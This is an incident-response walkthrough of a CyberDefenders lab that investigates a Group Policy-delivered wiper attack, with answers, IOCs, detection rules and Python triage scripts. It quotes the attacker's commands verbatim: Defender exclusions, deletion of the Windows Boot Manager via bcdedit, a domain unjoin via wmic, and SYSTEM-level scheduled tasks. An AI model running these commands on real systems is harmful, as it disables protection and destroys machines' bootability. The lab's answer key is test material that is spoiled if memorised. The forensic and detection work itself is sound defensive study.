MeteorHit - Indra Walkthrough | CyberDefenders Lab

Scenario

A critical network infrastructure experienced operational disruption after multiple systems were compromised and wiped. Public message boards displayed politically charged messages, and the initial investigation suggested that the attackers abused Active Directory and deployed destructive malware across domain-joined machines.

The evidence provided for this lab was a KAPE SANS Triage collection from one of the affected machines. The collection was not a full disk image, but it preserved several high-value forensic artifacts such as registry hives, Windows event logs, Prefetch, Amcache, scheduled tasks, $MFT, $LogFile, and $Extend.

The activity in this lab closely resembles the MeteorExpress attack chain documented by SentinelLABS, where Group Policy was abused to execute a setup script, stage payloads, extract archives, deploy wiper components, and use a screen-locking component to prevent user access.

Evidence and Triage Approach

Before answering the lab questions, I performed a quick black-box triage to understand what evidence was available.

Important artifacts in the collection included:

C\Windows\System32\winevt\Logs
C\Windows\System32\config
C\Windows\Prefetch
C\Windows\AppCompat\Programs\Amcache.hve
C\Windows\System32\Tasks
C\$MFT
C\$LogFile
C\$Extend
C\ProgramData

The host context identified during triage was:

Hostname: DESKTOP-VBIOB4B
Domain: abc.local
Time zone: Pacific Standard Time
Observed users: Farid_Ebrahim, fred, Administrator, Guest

The SOFTWARE hive was reported as a dirty hive when loaded in Registry Explorer. Replaying registry transaction logs was important because some Group Policy script configuration was not visible in the initial hive view. After replaying the hive logs, the Group Policy script registry data became available.

For process execution analysis, Sysmon was the most valuable source. I parsed Sysmon logs with EvtxECmd.exe and reviewed the CSV in Timeline Explorer for broad filtering. For exact field extraction such as Image, CommandLine, ProcessId, ParentProcessId, Hashes, and parent-child relationships, Sysmon Event ID 1 was the primary artifact.

EvtxECmd.exe -f "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx" --csv "C:\Users\Administrator\Desktop\Start Here\Output"

Timeline Explorer made it easier to filter values such as:

setup.bat
expand.exe
env.cab
Rar.exe
Add-MpPreference
schtasks
bcdedit
wmic
mssetup.exe
msuser.reg

Q1. The attack began with using a Group Policy Object (GPO) to execute a malicious batch file. What is the name of the malicious GPO responsible for initiating the attack by running a script?

The first lead was Group Policy script execution. I initially checked:

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History

This showed Group Policy-related GUIDs, but not every GUID under this path is a GPO ID. Some GUIDs are Client-Side Extension GUIDs, which represent Group Policy processing components such as registry policy, security settings, or script processing.

The useful data became visible after replaying the dirty SOFTWARE hive transaction logs. The script configuration was found under the Group Policy script registry area:

Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup\0

The registry values showed the GPO metadata:

GPO-ID: cn={8C069217-9EBB-454D-BE84-32317C017A0C},cn=policies,cn=system,DC=abc,DC=local
FileSysPath: \\abc.local\SysVol\abc.local\Policies\{8C069217-9EBB-454D-BE84-32317C017A0C}\Machine
DisplayName: DeploySetup
GPOName: {8C069217-9EBB-454D-BE84-32317C017A0C}

The child script entry showed that the GPO executed:

setup.bat

[Figure: GPO script registry evidence]

Answer: DeploySetup


Q2. During the investigation, a specific file containing critical components necessary for the later stages of the attack was found on the system. This file, expanded using a built-in tool, played a crucial role in staging the malware. What is the name of the file, and where was it located on the system? Please provide the full file path.

After identifying the GPO-based setup.bat execution, I pivoted into Sysmon Event ID 1 to reconstruct commands launched by the script.

The parent command line repeatedly pointed back to the GPO-launched batch file:

ParentCommandLine: C:\Windows\system32\cmd.exe /c ""\\WIN-499DAFSKAR7\Data\scripts\setup.bat" "

One important command showed the Windows built-in expand.exe utility being used to extract a CAB archive:

expand "C:\ProgramData\Microsoft\env\env.cab" /F:* "C:\ProgramData\Microsoft\env"

expand.exe is a built-in Windows utility for extracting CAB archives; here it unpacked the archive that staged the files required for the next phase of execution.

The file expanded by the script was:

C:\ProgramData\Microsoft\env\env.cab

The path is suspicious because it uses a Microsoft-looking directory under ProgramData, but C:\ProgramData\Microsoft\env\ is not a normal Windows system binary or update location.

The full list of notable commands tied to setup.bat also showed broader staging and defense-evasion behavior:

schtasks /delete /tn "Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeAll" /F
hostname
expand "C:\ProgramData\Microsoft\env\env.cab" /F:* "C:\ProgramData\Microsoft\env"
"Rar.exe" x "C:\ProgramData\Microsoft\env\programs.rar" -phackemall
ipconfig /release
powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }"
reg query "HKLM\SOFTWARE\KasperskyLab"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\update.bat'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\Rar.exe'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\programs.rar'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\cache.bat'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\ms.rar'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\msrun.bat'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\mssetup.exe'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\msconf.conf'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\bcd.bat'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\env.exe'"
"Rar.exe" x "C:\ProgramData\Microsoft\env\bcd.rar" -phackemall
bcdedit /v | findstr identifier
"Rar.exe" x "C:\ProgramData\Microsoft\env\ms.rar" -phackemall
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP" /v LockScreenImagePath /t REG_SZ /d C:\temp\mscap.jpg /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP" /v LockScreenImageUrl /t REG_SZ /d C:\temp\mscap.jpg /f
powershell -command "(Get-Date).AddMinutes(3.5).ToString('HH:mm:ss')"
schtasks /CREATE /SC ONCE /ST 09:08:13 /TN "mstask" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" C:\temp\msconf.conf"
ping localhost -n 20

Answer: C:\ProgramData\Microsoft\env\env.cab


Q3. The attacker employed password-protected archives to conceal malicious files, making it important to uncover the password used for extraction. Identifying this password is key to accessing the contents and analyzing the attack further. What is the password used to extract the malicious files?

The setup.bat command line showed Rar.exe extracting password-protected archives.

The relevant commands were:

"Rar.exe" x "C:\ProgramData\Microsoft\env\programs.rar" -phackemall
"Rar.exe" x "C:\ProgramData\Microsoft\env\bcd.rar" -phackemall
"Rar.exe" x "C:\ProgramData\Microsoft\env\ms.rar" -phackemall

The -p option supplies the password to Rar.exe. Here, the password was provided inline as:

hackemall

Sysmon file creation evidence also showed Rar.exe extracting additional files into the staging directory:

C:\ProgramData\Microsoft\env\cache.bat
C:\ProgramData\Microsoft\env\bcd.bat
C:\ProgramData\Microsoft\env\msrun.bat
C:\ProgramData\Microsoft\env\mssetup.exe

Answer: hackemall


Q4. Several commands were executed to add exclusions to Windows Defender, preventing it from scanning specific files. This behavior is commonly used by attackers to ensure that malicious files are not detected by the system’s built-in antivirus. Tracking these exclusion commands is crucial for identifying which files have been protected from antivirus scans. What is the name of the first file added to the Windows Defender exclusion list?

The batch script used PowerShell to add Microsoft Defender exclusions through Add-MpPreference.

The first observed exclusion command was:

powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\update.bat'"

This exclusion was observed at approximately:

2024-09-24 16:04:23 UTC

Attackers commonly use Defender exclusions to prevent malicious scripts, tools, archives, and payloads from being scanned or quarantined.

Answer: update.bat


Q5. A scheduled task has been configured to execute a file after a set delay. Understanding this delay is important for investigating the timing of potential malicious activity. How many seconds after the task creation time is it scheduled to run?

The script calculated a time offset using PowerShell:

C:\Windows\system32\cmd.exe /c powershell -command "(Get-Date).AddMinutes(3.5).ToString('HH:mm:ss')"

It then used the calculated time to create a one-time scheduled task named mstask:

schtasks /CREATE /SC ONCE /ST 09:08:13 /TN "mstask" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" C:\temp\msconf.conf"

The delay was 3.5 minutes.

3.5 minutes x 60 seconds = 210 seconds

Answer: 210


Q6. After the malware execution, the wmic utility was used to unjoin the computer system from a domain or workgroup. Tracking this operation is essential for identifying system reconfigurations or unauthorized changes. What is the Process ID (PID) of the utility responsible for performing this action?

Sysmon Event ID 1 showed WMIC.exe being used to unjoin the machine from the domain or workgroup.

The process creation event showed:

TimeCreated: 9/24/2024 4:08:01 PM
User: NT AUTHORITY\SYSTEM
Image: C:\Windows\SysWOW64\wbem\WMIC.exe
CommandLine: wmic computersystem where name="DESKTOP-VBIOB4B" call unjoindomainorworkgroup
ProcessId: 7492
ParentImage: C:\Windows\SysWOW64\cmd.exe
ParentCommandLine: C:\Windows\System32\cmd.exe /c wmic computersystem where name="%computername%" call unjoindomainorworkgroup
ParentProcessId: 7200

The PID of the WMIC.exe process was:

7492

Answer: 7492


Q7. The malware executed a command to delete the Windows Boot Manager, a critical component responsible for loading the operating system during startup. This action can render the system unbootable, leading to serious operational disruptions and making recovery more difficult. What command did the malware use to delete the Windows Boot Manager?

After env.exe was launched with msconf.conf, it spawned commands related to boot configuration tampering.

The process chain showed:

C:\ProgramData\Microsoft\env\env.exe C:\temp\msconf.conf
  -> C:\Windows\SysWOW64\cmd.exe
    -> C:\Windows\System32\bcdedit.exe

The Sysmon event showed the command used to delete the Windows Boot Manager object:

Image: C:\Windows\System32\bcdedit.exe
CommandLine: C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f
ProcessId: 7528
ParentImage: C:\Windows\SysWOW64\cmd.exe
ParentProcessId: 7548

The GUID {9dea862c-5cdd-4e70-acc1-f32b344d4795} represents the Windows Boot Manager object in BCD. Deleting this object can affect system bootability and recovery.

Answer: C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f


Q8. The malware created a scheduled task to ensure persistence and maintain control over the compromised system. This task is configured to run with elevated privileges every time the system starts, ensuring the malware continues to execute. What is the name of the scheduled task created by the malware to maintain persistence?

The malware later created another scheduled task for startup persistence.

The command observed in Sysmon was:

C:\Windows\System32\cmd.exe /c schtasks /CREATE /SC ONSTART /TN "Aa153!EGzN" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" \"C:\temp\msconf.conf\"" /F

Breaking down the important parts:

/SC ONSTART    Run at system startup
/TN            Task name
/RL HIGHEST    Run with highest privileges
/RU SYSTEM     Run as NT AUTHORITY\SYSTEM
/TR            Execute env.exe with msconf.conf

The task name was:

Aa153!EGzN

This is suspicious because the task runs from an unusual ProgramData path and uses a random-looking task name.

Answer: Aa153!EGzN


Q9. A malicious program was used to lock the screen, preventing users from accessing the system. Investigating this malware is important to identify its behavior and mitigate its impact. What is the name of this malware? (not the filename)

After env.exe executed with msconf.conf, Sysmon showed it launching the screen-locking component:

ParentCommandLine: C:\ProgramData\Microsoft\env\env.exe C:\temp\msconf.conf
CommandLine: "C:\temp\mssetup.exe" /LOCK

The question asks for the malware name, not the filename. The filename observed in the process execution was mssetup.exe, but the lab-identified malware name for the screen-locking component was:

BreakWin

This behavior also aligns with the broader MeteorExpress-style chain where the wiper activity is accompanied by a screen-locking component.

Answer: BreakWin


Q10. The disk shows a pattern where malware overwrites data (potentially with zero-bytes) and then deletes it, a behavior commonly linked to Wiper malware activity. The USN (Update Sequence Number) is vital for tracking filesystem changes on an NTFS volume, enabling investigators to trace when files are created, modified, or deleted, even if they are no longer present. This is critical for building a timeline of file activity and detecting potential tampering. What is the USN associated with the deletion of the file msuser.reg?

This question required analyzing the NTFS USN Journal, not just $MFT.

The difference matters:

$MFT      -> File metadata and timestamps
$UsnJrnl  -> File-system change history

$MFT can show that a file existed and provide metadata such as timestamps and file references. The USN Journal records file-system changes such as file creation, data overwrite, rename, and deletion. That makes it especially useful in wiper investigations.

I parsed the USN Journal with MFTECmd and reviewed the CSV in Timeline Explorer.

MFTECmd.exe -f "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\$Extend\$J" --csv "C:\Users\Administrator\Desktop\Start Here\Output"

In Timeline Explorer, I filtered for:

msuser.reg

The relevant row showed a deletion event:

Name: msuser.reg
Update Reason: FileDelete
Update Sequence Number: 11721008

[Figure: USN Journal deletion evidence]

Answer: 11721008


Reconstructed Attack Timeline

The final attack flow reconstructed from registry, Sysmon, scheduled task, and NTFS artifacts was:

1. Malicious GPO "DeploySetup" executes setup.bat.
2. setup.bat stages payloads under C:\ProgramData\Microsoft\env.
3. expand.exe extracts C:\ProgramData\Microsoft\env\env.cab.
4. Rar.exe extracts password-protected archives using password "hackemall".
5. setup.bat adds Microsoft Defender exclusions for staged files.
6. A delayed scheduled task "mstask" is configured to run env.exe with msconf.conf.
7. env.exe executes destructive and system modification actions.
8. WMIC.exe unjoins the host from the domain/workgroup.
9. bcdedit.exe deletes the Windows Boot Manager BCD object.
10. A startup persistence task "Aa153!EGzN" is created.
11. mssetup.exe /LOCK is launched as the screen-locking component.
12. USN Journal records show wiper-like deletion activity for msuser.reg.

Indicators of Compromise

Files and Paths

\\WIN-499DAFSKAR7\Data\scripts\setup.bat
C:\ProgramData\Microsoft\env\env.cab
C:\ProgramData\Microsoft\env\Rar.exe
C:\ProgramData\Microsoft\env\programs.rar
C:\ProgramData\Microsoft\env\bcd.rar
C:\ProgramData\Microsoft\env\ms.rar
C:\ProgramData\Microsoft\env\update.bat
C:\ProgramData\Microsoft\env\cache.bat
C:\ProgramData\Microsoft\env\bcd.bat
C:\ProgramData\Microsoft\env\msrun.bat
C:\ProgramData\Microsoft\env\mssetup.exe
C:\ProgramData\Microsoft\env\msconf.conf
C:\ProgramData\Microsoft\env\env.exe
C:\temp\msconf.conf
C:\temp\mssetup.exe
C:\temp\mscap.jpg
msuser.reg

Scheduled Tasks

mstask
Aa153!EGzN

Notable Commands

expand "C:\ProgramData\Microsoft\env\env.cab" /F:* "C:\ProgramData\Microsoft\env"

"Rar.exe" x "C:\ProgramData\Microsoft\env\programs.rar" -phackemall

powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\update.bat'"

schtasks /CREATE /SC ONCE /ST 09:08:13 /TN "mstask" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" C:\temp\msconf.conf"

wmic computersystem where name="DESKTOP-VBIOB4B" call unjoindomainorworkgroup

C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f

schtasks /CREATE /SC ONSTART /TN "Aa153!EGzN" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" \"C:\temp\msconf.conf\"" /F

"C:\temp\mssetup.exe" /LOCK

Detection Opportunities

GPO Script Abuse

Monitor for Group Policy scripts launching command interpreters from SYSVOL or administrative shares.

gpscript.exe -> cmd.exe -> setup.bat
cmd.exe /c "\\*\Data\scripts\*.bat"

Archive Staging with Built-in Utilities

Alert on expand.exe extracting archives into suspicious ProgramData paths.

expand.exe *.cab /F:* C:\ProgramData\*

Password-Protected Archive Extraction

Monitor suspicious archive extraction with passwords in command line.

Rar.exe x *.rar -p*

Defender Exclusions

Alert on Defender exclusions added for scripts, archives, and executables under user-writable or unusual paths.

powershell.exe Add-MpPreference -ExclusionPath C:\ProgramData\*

Scheduled Task Persistence

Detect scheduled tasks running as SYSTEM from unusual paths.

schtasks.exe /CREATE /SC ONSTART /RU SYSTEM

Boot Configuration Tampering

Detect destructive bcdedit.exe usage.

bcdedit.exe /delete
bcdedit.exe /set recoveryenabled No
bcdedit.exe /set bootstatuspolicy ignoreallfailures

Domain/Workgroup Tampering

Detect wmic.exe unjoin operations.

wmic computersystem call unjoindomainorworkgroup

Screen Locking Behavior

Monitor execution of suspicious binaries with /LOCK and registry modifications to lock screen configuration.

mssetup.exe /LOCK
PersonalizationCSP
LockScreenImagePath
LockScreenImageUrl
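The Sysmon-based checks above can be scripted rather than eyeballed in Timeline Explorer. The following is an added example, not code from the lab or from any of the tools named in this walkthrough: it parses Sysmon Event ID 1 XML (as exported from the EVTX), applies the command-line patterns listed in the sections above, and walks ParentProcessId links to rebuild chains such as env.exe -> cmd.exe -> bcdedit.exe. The sample events are constructed from this page's command lines; the rule regexes, the 5xxx PIDs, 7100 and 7600 are my own assumptions.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Detection patterns from the sections above, matched case-insensitively against CommandLine.
RULES = {
    "gpo_script":         r'cmd\.exe\s+/c\s+"*\\\\\S+\.bat',         # cmd.exe /c "\\share\...\x.bat"
    "archive_staging":    r"^expand\b.*\.cab.*programdata",           # expand.exe *.cab into ProgramData
    "rar_password":       r"rar\.exe.*\s-p\S+",                       # Rar.exe x *.rar -p<password>
    "defender_exclusion": r"add-mppreference.*-exclusionpath",
    "task_persistence":   r"schtasks.*/create.*/ru\s+system",
    "bcd_tamper":         r"bcdedit.*(/delete|recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
    "domain_unjoin":      r"unjoindomainorworkgroup",
    "screen_lock":        r'mssetup\.exe"?\s+/lock',
}

def parse_event(xml_text):
    """Flatten one Sysmon EID 1 <Event> into a dict keyed by each <Data Name="..."> attribute."""
    root = ET.fromstring(xml_text)
    rec = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
    return {**rec, "ProcessId": int(rec["ProcessId"]), "ParentProcessId": int(rec["ParentProcessId"])}

def detect(rec):  # names of the rules whose pattern matches this record's command line
    return [name for name, pat in RULES.items() if re.search(pat, rec["CommandLine"], re.I)]

def ancestry(records, pid):
    """Walk ParentProcessId links upward: image basenames from the process to the last parent seen."""
    by_pid = {r["ProcessId"]: r for r in records}
    chain = []
    while pid in by_pid and len(chain) < 32:          # bound the walk in case of PID-reuse loops
        chain.append(by_pid[pid]["Image"].rsplit("\\", 1)[-1])
        pid = by_pid[pid]["ParentProcessId"]
    return chain

def triage(xml_events):  # flagged ProcessId -> (matched rules, parent chain)
    records = [parse_event(x) for x in xml_events]
    return {r["ProcessId"]: (detect(r), ancestry(records, r["ProcessId"])) for r in records if detect(r)}

# Constructed sample events modelled on the command lines in this walkthrough, not the lab's EVTX:
# PIDs 7200/7492/7548/7528 follow the page; the 5xxx PIDs, 7100, 7600 and the root parents are made up.
def _event(pid, ppid, image, cmd):
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>1</EventID></System><EventData>'
            f'<Data Name="ProcessId">{pid}</Data><Data Name="Image">{escape(image)}</Data>'
            f'<Data Name="CommandLine">{escape(cmd)}</Data><Data Name="ParentProcessId">{ppid}</Data></EventData></Event>')
ENV = r"C:\ProgramData\Microsoft\env"
SAMPLE_EVENTS = [
    _event(5000, 4000, r"C:\Windows\System32\cmd.exe",
           r'C:\Windows\system32\cmd.exe /c ""\\WIN-499DAFSKAR7\Data\scripts\setup.bat" "'),
    _event(5010, 5000, r"C:\Windows\System32\expand.exe", f'expand "{ENV}\\env.cab" /F:* "{ENV}"'),
    _event(5020, 5000, ENV + r"\Rar.exe", f'"Rar.exe" x "{ENV}\\programs.rar" -phackemall'),
    _event(5030, 5000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           f"powershell -Command \"Add-MpPreference -Force -ExclusionPath '{ENV}\\update.bat'\""),
    _event(5040, 5000, r"C:\Windows\System32\schtasks.exe",
           f'schtasks /CREATE /SC ONCE /ST 09:08:13 /TN "mstask" /RL HIGHEST /RU SYSTEM /TR "\\"{ENV}\\env.exe\\" C:\\temp\\msconf.conf"'),
    _event(7100, 900, ENV + r"\env.exe", ENV + r"\env.exe C:\temp\msconf.conf"),
    _event(7200, 7100, r"C:\Windows\SysWOW64\cmd.exe",
           r'C:\Windows\System32\cmd.exe /c wmic computersystem where name="%computername%" call unjoindomainorworkgroup'),
    _event(7492, 7200, r"C:\Windows\SysWOW64\wbem\WMIC.exe",
           r'wmic computersystem where name="DESKTOP-VBIOB4B" call unjoindomainorworkgroup'),
    _event(7548, 7100, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe /c bcd.bat"),
    _event(7528, 7548, r"C:\Windows\System32\bcdedit.exe",
           r"C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f"),
    _event(7600, 7100, r"C:\temp\mssetup.exe", r'"C:\temp\mssetup.exe" /LOCK'),
]
```

Against a real export, feed `triage()` the `<Event>` elements of the EvtxECmd XML output (or any Sysmon XML) and review the chains for the hits; a cmd.exe child of env.exe or a SYSTEM scheduled task pointing into ProgramData is the kind of pairing that stands out.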

Wiper-Like USN Patterns

During incident response, inspect USN Journal records for sequences such as:

DataOverwrite
DataTruncation
FileDelete
Close
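The overwrite-then-delete sequence can be searched for across the whole journal rather than one file name at a time, which is how the Q10 lookup generalizes. The block below is an added example, not part of the lab or of MFTECmd: it reads $J rows in the shape of MFTECmd's CSV output (the column names are my assumption; adjust them to your export), groups records by MFT file reference so a reused entry number is not conflated with the wiped file, and reports files that were overwritten or truncated and then deleted. Every row except msuser.reg's FileDelete USN is constructed.

```python
import csv
import io
from collections import defaultdict

# Constructed $J rows in the shape of MFTECmd's CSV (column names assumed from MFTECmd output; adjust if
# yours differ). Only msuser.reg's FileDelete USN (11721008) comes from the lab; everything else is made up.
SAMPLE_CSV = r"""Name,Extension,EntryNumber,SequenceNumber,ParentPath,UpdateSequenceNumber,UpdateTimestamp,UpdateReasons
msuser.reg,.reg,31415,2,.\temp,11720856,2024-09-24 16:09:02.1000000,DataOverwrite
msuser.reg,.reg,31415,2,.\temp,11720928,2024-09-24 16:09:02.1200000,DataOverwrite|DataTruncation
msuser.reg,.reg,31415,2,.\temp,11720992,2024-09-24 16:09:02.1400000,DataTruncation|Close
msuser.reg,.reg,31415,2,.\temp,11721008,2024-09-24 16:09:02.1600000,FileDelete|Close
payroll.xlsx,.xlsx,40210,1,.\Users\fred\Documents,11721096,2024-09-24 16:09:02.3000000,DataOverwrite|Close
payroll.xlsx,.xlsx,40210,1,.\Users\fred\Documents,11721192,2024-09-24 16:09:02.3200000,FileDelete|Close
notes.txt,.txt,40300,3,.\Users\fred\Documents,11721280,2024-09-24 16:09:05.0000000,DataExtend|Close
report.docx,.docx,40400,1,.\Users\fred\Documents,11721368,2024-09-24 16:09:07.0000000,FileDelete|Close
msuser.reg,.reg,31415,3,.\temp,11721456,2024-09-24 16:10:00.0000000,FileCreate|Close
"""

WIPE_REASONS = {"DataOverwrite", "DataTruncation"}

def load_usn(csv_text):
    """Parse $J CSV rows into dicts with integer USN, file reference (entry, sequence) and a reason set."""
    rows = []
    for r in csv.DictReader(io.StringIO(csv_text)):
        rows.append({
            "name": r["Name"], "path": r["ParentPath"],
            "ref": (int(r["EntryNumber"]), int(r["SequenceNumber"])),
            "usn": int(r["UpdateSequenceNumber"]), "time": r["UpdateTimestamp"],
            "reasons": set(r["UpdateReasons"].split("|")),   # MFTECmd joins multiple reasons with '|'
        })
    return sorted(rows, key=lambda r: r["usn"])    # the journal is append-only, so USN order is time order

def deletion_usns(rows, name):
    """USN of every FileDelete record carrying the given file name (the Q10-style lookup)."""
    return [r["usn"] for r in rows if r["name"].lower() == name.lower() and "FileDelete" in r["reasons"]]

def wiper_candidates(rows):
    """Files whose history shows overwrite/truncate followed by deletion on the same MFT file reference."""
    by_ref = defaultdict(list)
    for r in rows:                               # key on the reference, not the name: MFT entries get reused
        by_ref[r["ref"]].append(r)
    hits = []
    for ref, hist in by_ref.items():
        wipe = [r for r in hist if r["reasons"] & WIPE_REASONS]
        dele = [r for r in hist if "FileDelete" in r["reasons"]]
        if wipe and dele and wipe[0]["usn"] < dele[-1]["usn"]:
            hits.append({"name": hist[0]["name"], "path": hist[0]["path"], "ref": ref,
                         "first_wipe_usn": wipe[0]["usn"], "delete_usn": dele[-1]["usn"]})
    return sorted(hits, key=lambda h: h["delete_usn"])

if __name__ == "__main__":
    for h in wiper_candidates(load_usn(SAMPLE_CSV)):
        print(f"{h['path']}\\{h['name']}  ref={h['ref']}  wipe@{h['first_wipe_usn']} -> delete@{h['delete_usn']}")
```

Note that report.docx (a plain delete) and the later msuser.reg FileCreate on sequence 3 are not reported, which is the point of grouping by reference rather than by name.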

Lessons Learned

This lab was a good reminder that destructive malware investigations require more than finding a suspicious executable. The attack chain became clear only after correlating registry, Sysmon, scheduled tasks, and NTFS artifacts.

The most useful evidence sources were:

Registry          -> GPO script configuration and startup script metadata
Sysmon            -> Process execution, command lines, PIDs, hashes, parent-child chains
Scheduled Tasks   -> Delayed execution and startup persistence
Prefetch          -> Corroborating evidence of execution
USN Journal       -> File-system change and deletion history

A key lesson was that Group Policy artifacts can be confusing because registry paths may contain both actual GPO GUIDs and Client-Side Extension GUIDs. Treating every GUID as a GPO ID can lead to wrong conclusions.

Another important lesson was the value of replaying registry transaction logs when working with offline hives. In this case, replaying the dirty hive made the Group Policy script information visible.

For timeline review, EvtxECmd.exe and Timeline Explorer were useful for broad filtering, while direct Sysmon XML parsing was better for exact fields such as ProcessId, ParentProcessId, Image, CommandLine, and Hashes.


Final Answers

Question   Answer
Q1         DeploySetup
Q2         C:\ProgramData\Microsoft\env\env.cab
Q3         hackemall
Q4         update.bat
Q5         210
Q6         7492
Q7         C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f
Q8         Aa153!EGzN
Q9         BreakWin
Q10        11721008
